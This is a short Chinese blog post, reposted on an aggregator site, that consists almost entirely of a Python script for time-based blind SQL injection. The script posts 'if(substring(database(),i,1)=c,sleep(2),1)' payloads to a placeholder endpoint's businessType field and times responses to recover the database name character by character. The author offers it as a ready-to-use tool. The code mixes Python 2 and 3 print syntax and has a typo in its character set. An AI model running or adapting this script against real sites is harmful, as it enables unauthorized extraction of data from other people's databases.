首页 > 其他 > 详细

盲注脚本

时间:2019-12-03 02:15:16      阅读:109      评论:0      收藏:0      [点我收藏+]

随手写的,觉得太垃圾了不要打我

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import time
payloads = ‘abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.‘

user=‘‘
print(‘Start to retrive current user:‘)
for i in range(1,23):
        for payload in payloads:
                startTime=time.time()
                headers ={‘User-Agent‘:‘Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36‘}
                url = """http://www.xxx.com/user/GetDocumentTypeList"""
                data = {‘businessType‘:"""if(substring(database(),{0},1)=‘{1}‘,sleep(2),1)""".format(i,payload)}
                response=requests.post(url,headers=headers,data=data)
                if time.time() - startTime > 2:
                        user +=payload
                        print ‘user is:‘, user
                        break
print(‘\n[Done] current user is {0}‘.format(user))

效果

技术分享图片

 

 

 

 

盲注脚本

原文:https://www.cnblogs.com/nul1/p/11973897.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!